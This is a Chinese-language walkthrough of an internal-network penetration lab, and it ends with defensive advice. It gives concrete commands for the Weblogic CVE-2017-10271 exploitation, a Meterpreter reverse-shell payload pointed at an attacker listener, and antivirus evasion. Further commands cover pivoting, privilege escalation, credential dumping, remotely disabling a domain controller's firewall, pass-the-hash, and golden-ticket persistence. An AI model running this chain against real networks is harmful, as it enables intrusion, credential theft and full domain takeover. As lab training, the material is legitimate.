记一次内网渗透靶场学习
字数 1727 2025-08-05 08:19:43

内网渗透靶场实战教学文档

环境介绍

网络拓扑结构

  • Web服务器
    • 外网IP:192.168.10.80
    • 内网IP:10.10.10.80
  • PC主机
    • 外网IP:192.168.10.201
    • 内网IP:10.10.10.201
  • 域控制器(DC)
    • 内网IP:10.10.10.10
  • 攻击者机器
    • IP:192.168.10.30 (用于MSF监听)

所有目标机器(Web、PC、DC)都处于同一域环境(de1ay.com)内,需要手动开启Weblogic服务。

外网渗透阶段

1. 端口探测与信息收集

使用Nmap进行初步扫描:

nmap -T4 -sC -sV 192.168.10.80

发现关键端口:

  • 1433端口:SQL Server服务
  • 7001端口:Weblogic服务

2. Weblogic漏洞利用

访问Weblogic控制台:

http://192.168.10.80:7001/console

尝试弱口令(weblogic/weblogic)未成功。

使用漏洞检测工具发现存在CVE-2017-10271反序列化漏洞,利用该漏洞进行命令执行:

  • 获取的权限为administrator
  • 发现双网卡配置,判断存在域环境
  • 发现360主动防御进程运行中

3. 上传Webshell

尝试上传JSP马失败(可能被360拦截),改用冰蝎的Webshell成功连接。

信息收集发现:

  • DNS服务器:de1ay.com
  • 确认域环境存在

4. MSF上线

生成Meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.30 lport=4444 -f exe > msf.exe

由于360拦截,需进行免杀处理:

  1. 对原生MSF payload进行混淆
  2. 上传并执行处理后的payload
  3. 成功上线MSF

内网渗透阶段

1. 内网路由配置

添加内网路由:

route add 10.10.10.0 255.255.255.0 1
route print

设置SOCKS代理:

use auxiliary/server/socks4a
run

在proxychains.conf中添加路由配置。

2. 内网主机发现

使用MSF的udp_probe模块扫描:

use auxiliary/scanner/discovery/udp_probe
set RHOSTS 10.10.10.0/24
run

发现内网主机:

  • 10.10.10.10 (DC)
  • 10.10.10.201 (PC)

常规Nmap扫描受阻(防火墙原因)。

3. MS17-010漏洞利用

扫描永恒之蓝漏洞:

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.10.10.0/24
set THREADS 5
run

发现两台主机均存在漏洞,但直接利用失败(匿名管道未开启)。

4. MSF派生CS会话

由于当前仅为user权限,无法使用mimikatz,决定派生会话到Cobalt Strike:

use exploit/windows/local/payload_inject
set PAYLOAD windows/meterpreter/reverse_http
set DisablePayloadHandler true
set LHOST 192.168.1.5
set LPORT 5555
set SESSION 2
run

在CS上创建对应监听(192.168.1.5:5555)接收会话。

5. 权限提升

查看系统信息:

systeminfo

发现补丁较少,使用MS14-058漏洞提权至system权限。

6. 凭证获取

使用logonpasswords获取凭证:

  • 发现SID为500的域管账户
  • 获取NTLM hash

横向移动

1. 内网主机确认

确认三台内网主机:

  • 10.10.10.10 (DC)
  • 10.10.10.80 (Web)
  • 10.10.10.201 (PC)

2. PTH攻击尝试

尝试使用psexec进行Pass-the-Hash攻击失败(防火墙阻挡)。

3. 关闭防火墙

通过IPC$连接域控:

net use \\10.10.10.10\ipc$ 1qaz@WSX /user:Administrator
net use

创建计划任务关闭防火墙:

sc \\10.10.10.10 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\10.10.10.10 start unablefirewall

4. SMB Beacon中转

由于DC只有内网IP,使用CS的SMB Beacon进行流量中转:

  1. 创建SMB Beacon监听
  2. 使用psexec通过SMB Beacon上线DC

5. 批量PTH

使用获取的域管凭证批量上线内网主机。

权限维持

黄金票据制作

  1. 获取krbtgt的NTLM hash: 
    hashdump
  2. 查看域SID
  3. 在Web主机上生成黄金票据: 
    golden_ticket_create -u Administrator -d de1ay.com -s S-1-5-21-... -k <krbtgt_hash> -t gold.tck
  4. 使用黄金票据访问域控资源验证成功: 
    dir \\10.10.10.10\c$

关键点总结

  1. Weblogic漏洞利用:CVE-2017-10271是常见入口点
  2. 免杀处理:针对360等安全产品需进行payload混淆
  3. 内网路由配置:正确添加路由是内网渗透基础
  4. 权限提升:MS14-058是有效的提权手段
  5. 凭证获取:logonpasswords获取域管hash是关键转折点
  6. 横向移动
    • 防火墙是常见障碍
    • SMB Beacon是内网中转的有效方法
  7. 权限维持:黄金票据可绕过常规认证机制

防御建议

  1. 及时修补Weblogic等中间件漏洞
  2. 限制管理接口的外网访问
  3. 部署EDR类产品防御横向移动
  4. 定期轮换krbtgt账户密码
  5. 监控异常票据生成和使用
  6. 启用防火墙并严格管理规则
  7. 限制IPC$等管道的匿名访问
内网渗透靶场实战教学文档 环境介绍 网络拓扑结构 Web服务器 : 外网IP:192.168.10.80 内网IP:10.10.10.80 PC主机 : 外网IP:192.168.10.201 内网IP:10.10.10.201 域控制器(DC) : 内网IP:10.10.10.10 攻击者机器 : IP:192.168.10.30 (用于MSF监听) 所有目标机器(Web、PC、DC)都处于同一域环境(de1ay.com)内,需要手动开启Weblogic服务。 外网渗透阶段 1. 端口探测与信息收集 使用Nmap进行初步扫描: 发现关键端口: 1433端口:SQL Server服务 7001端口:Weblogic服务 2. Weblogic漏洞利用 访问Weblogic控制台: 尝试弱口令(weblogic/weblogic)未成功。 使用漏洞检测工具发现存在CVE-2017-10271反序列化漏洞,利用该漏洞进行命令执行: 获取的权限为administrator 发现双网卡配置,判断存在域环境 发现360主动防御进程运行中 3. 上传Webshell 尝试上传JSP马失败(可能被360拦截),改用冰蝎的Webshell成功连接。 信息收集发现: DNS服务器:de1ay.com 确认域环境存在 4. MSF上线 生成Meterpreter payload: 由于360拦截,需进行免杀处理: 对原生MSF payload进行混淆 上传并执行处理后的payload 成功上线MSF 内网渗透阶段 1. 内网路由配置 添加内网路由: 设置SOCKS代理: 在proxychains.conf中添加路由配置。 2. 内网主机发现 使用MSF的udp_ probe模块扫描: 发现内网主机: 10.10.10.10 (DC) 10.10.10.201 (PC) 常规Nmap扫描受阻(防火墙原因)。 3. MS17-010漏洞利用 扫描永恒之蓝漏洞: 发现两台主机均存在漏洞,但直接利用失败(匿名管道未开启)。 4. MSF派生CS会话 由于当前仅为user权限,无法使用mimikatz,决定派生会话到Cobalt Strike: 在CS上创建对应监听(192.168.1.5:5555)接收会话。 5. 权限提升 查看系统信息: 发现补丁较少,使用MS14-058漏洞提权至system权限。 6. 凭证获取 使用logonpasswords获取凭证: 发现SID为500的域管账户 获取NTLM hash 横向移动 1. 内网主机确认 确认三台内网主机: 10.10.10.10 (DC) 10.10.10.80 (Web) 10.10.10.201 (PC) 2. PTH攻击尝试 尝试使用psexec进行Pass-the-Hash攻击失败(防火墙阻挡)。 3. 关闭防火墙 通过IPC$连接域控: 创建计划任务关闭防火墙: 4. SMB Beacon中转 由于DC只有内网IP,使用CS的SMB Beacon进行流量中转: 创建SMB Beacon监听 使用psexec通过SMB Beacon上线DC 5. 批量PTH 使用获取的域管凭证批量上线内网主机。 权限维持 黄金票据制作 获取krbtgt的NTLM hash: 查看域SID 在Web主机上生成黄金票据: 使用黄金票据访问域控资源验证成功: 关键点总结 Weblogic漏洞利用 :CVE-2017-10271是常见入口点 免杀处理 :针对360等安全产品需进行payload混淆 内网路由配置 :正确添加路由是内网渗透基础 权限提升 :MS14-058是有效的提权手段 凭证获取 :logonpasswords获取域管hash是关键转折点 横向移动 : 防火墙是常见障碍 SMB Beacon是内网中转的有效方法 权限维持 :黄金票据可绕过常规认证机制 防御建议 及时修补Weblogic等中间件漏洞 限制管理接口的外网访问 部署EDR类产品防御横向移动 定期轮换krbtgt账户密码 监控异常票据生成和使用 启用防火墙并严格管理规则 限制IPC$等管道的匿名访问